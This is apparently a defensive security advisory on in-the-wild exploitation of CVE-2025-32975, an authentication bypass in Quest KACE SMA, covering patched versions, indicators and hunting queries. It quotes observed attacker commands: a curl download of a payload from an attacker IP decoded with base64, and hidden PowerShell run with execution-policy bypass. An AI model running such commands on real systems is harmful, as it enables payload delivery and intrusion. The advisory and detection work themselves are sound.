CVE-2025-32975: Quest KACE SMA auth bypass exploited in the wild

CVE-2025-32975: Quest KACE SMA auth bypass exploited in the wild

Executive Summary

Since March 2026, the critical CVE-2025-32975 vulnerability in Quest KACE Systems Management Appliance (SMA) has been linked to active attacks against unpatched, internet-exposed systems. The flaw carries a CVSS score of 10.0 and allows attackers to bypass authentication and impersonate legitimate users, creating a direct path to full administrative control.

That matters because KACE SMA is not a peripheral asset. It is an endpoint management platform with privileged visibility into enterprise systems. In activity observed by Arctic Wolf, attackers used the flaw to seize admin access, fetch payloads from external infrastructure, create new accounts, harvest credentials, and move deeper into victim environments. For defenders, this is a patch-now issue with clear lateral movement and command-and-control risk.

---

The flaw: Authentication bypass

CVE-2025-32975 is a critical-severity vulnerability (CVSS 10.0) in the SSO authentication handling mechanism of Quest KACE SMA. The issue allows attackers to impersonate legitimate users without valid credentials, which can lead to full administrative takeover.

How the exploit works

1. Reach an exposed SMA instance over the network.
2. Abuse the SSO authentication path to bypass normal login requirements.
3. Impersonate a valid user or administrator and obtain privileged access.
4. Execute follow-on actions such as remote commands, account creation, and payload retrieval.
5. Establish persistence and expand access through credential theft or remote administration channels.

A simplified representation of the post-compromise activity observed by Arctic Wolf looks like this:

bashCopy
curl hxxp://216.126.225.156/<payload> | base64 -d > payload.bin
runkbot.exe <arguments>
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\temp\Enable-UpdateServices.ps1

The patch stream from Quest addressed this issue in 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4). The problem is no longer theoretical, however: exploitation is being observed on systems that remain unpatched and publicly reachable.

---

What is the CVE-2025-32975 exploitation timeline?

---

Why this matters: endpoint management as a high-value target

Key challenges

1. Administrative blast radius: An attacker who wins admin access to an endpoint management appliance can affect a large number of systems from a single control plane.
2. Exposure gap after patch release: The flaw was patched in 2025, but exposed systems remained reachable long enough for attackers to exploit them in 2026.
3. Post-compromise escalation: Observed activity included new admin creation, Mimikatz use, and access to backup and directory infrastructure, which raises the risk of broader domain compromise and ransomware staging.

Critical risk: A compromise of KACE SMA is not just a web admin issue. It can become an account takeover, privileged management plane compromise, and enterprise-wide incident response event.

---

Defensive posture: immediate actions

🔴 Patch every exposed KACE SMA appliance

Update any affected instance to one of Quest’s fixed builds immediately:

• 13.0.385+
• 13.1.81+
• 13.2.183+
• 14.0.341 Patch 5+
• 14.1.101 Patch 4+

🔴 Remove public exposure

If remote access is required, place SMA behind a VPN, hardened reverse access path, or tightly restricted firewall policy. Public internet exposure materially increases risk here.

👥 Review privileged access and new accounts

• Audit recent administrative account creation on SMA.
• Review changes tied to runkbot.exe activity.
• Reset credentials and rotate tokens if administrative access may have been abused.

🔍 Hunt for execution, persistence, and credential theft

Look for:

• curl downloads from 216.126.225.156
• Base64-decoded payload staging
• PowerShell launched with hidden or bypass flags
• Mimikatz or lookalike binaries such as asd.exe
• RDP access to backup systems, domain controllers, or identity infrastructure

Splunk example:

splCopy
index=windows OR index=edr
("runkbot.exe" OR "mimikatz" OR "asd.exe" OR "Enable-UpdateServices.ps1" OR "216.126.225.156")
| stats count min(_time) as firstSeen max(_time) as lastSeen by host, user, process_name, parent_process_name, dest_ip, command_line

Microsoft Sentinel example:

kqlCopy
DeviceProcessEvents
| where ProcessCommandLine has_any ("runkbot.exe", "mimikatz", "Enable-UpdateServices.ps1", "216.126.225.156")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

🛡️ Segment and validate backup paths

Because observed intrusions reached backup infrastructure and domain controllers, validate admin paths into Veeam, Veritas, AD, and similar crown-jewel services. Restrict east-west access where possible.

---

Indicators and observed attacker behavior

Arctic Wolf reported activity consistent with the following pattern:

• remote command execution via KACE functionality
• payload retrieval from 216.126.225.156
• additional administrator creation via runkbot.exe
• PowerShell execution with hidden or bypassed settings
• Windows Registry modifications for persistence or configuration changes
• credential theft using Mimikatz
• reconnaissance with net user, net group, and net time
• RDP access to backup infrastructure and domain controllers

This combination suggests operators were not stopping at initial access. They were using the appliance as a springboard for persistence, privilege expansion, and deeper operational control.

---

Bottom line

CVE-2025-32975 is a maximum-severity authentication bypass in a privileged enterprise platform, and attackers are already exploiting unpatched KACE SMA systems in the wild.

Key takeaways

✅ Patch status is not protection by itself — systems still exposed and unpatched remain viable targets long after disclosure.

✅ KACE SMA should be treated as high-impact infrastructure — compromise of an endpoint management appliance can cascade into credentials, backups, and domain administration.

✅ Exposure reduction matters — if an SMA instance is reachable from the public internet, the safest assumption is that it deserves immediate validation and remediation.

For your clients and users

Patch affected KACE SMA versions immediately, remove public exposure, and investigate for post-compromise activity if the appliance was internet-facing. Delays here increase the chance of administrative takeover and follow-on enterprise compromise.

---

Frequently Asked Questions

What is CVE-2025-32975?

CVE-2025-32975 is a critical authentication bypass vulnerability in Quest KACE SMA. It affects the product’s SSO authentication handling and can let attackers impersonate legitimate users without valid credentials.

Is CVE-2025-32975 being exploited?

Yes. Arctic Wolf reported malicious activity observed from the week of March 9, 2026 that is consistent with exploitation of CVE-2025-32975 on unpatched, internet-exposed KACE SMA systems.

Which versions are affected?

Affected versions include 13.0.x before 13.0.385, 13.1.x before 13.1.81, 13.2.x before 13.2.183, 14.0.x before 14.0.341 (Patch 5), and 14.1.x before 14.1.101 (Patch 4).

What should defenders do first?

Patch to a fixed version, remove direct internet exposure, review privileged account activity, and hunt for known post-compromise behaviors such as runkbot.exe, hidden PowerShell, Mimikatz, and suspicious outbound retrieval activity.

---

References

1. The Hacker News coverage of active exploitation
2. Arctic Wolf bulletin on CVE-2025-32975 exploitation
3. Quest advisory and fixed versions
4. NVD entry for CVE-2025-32975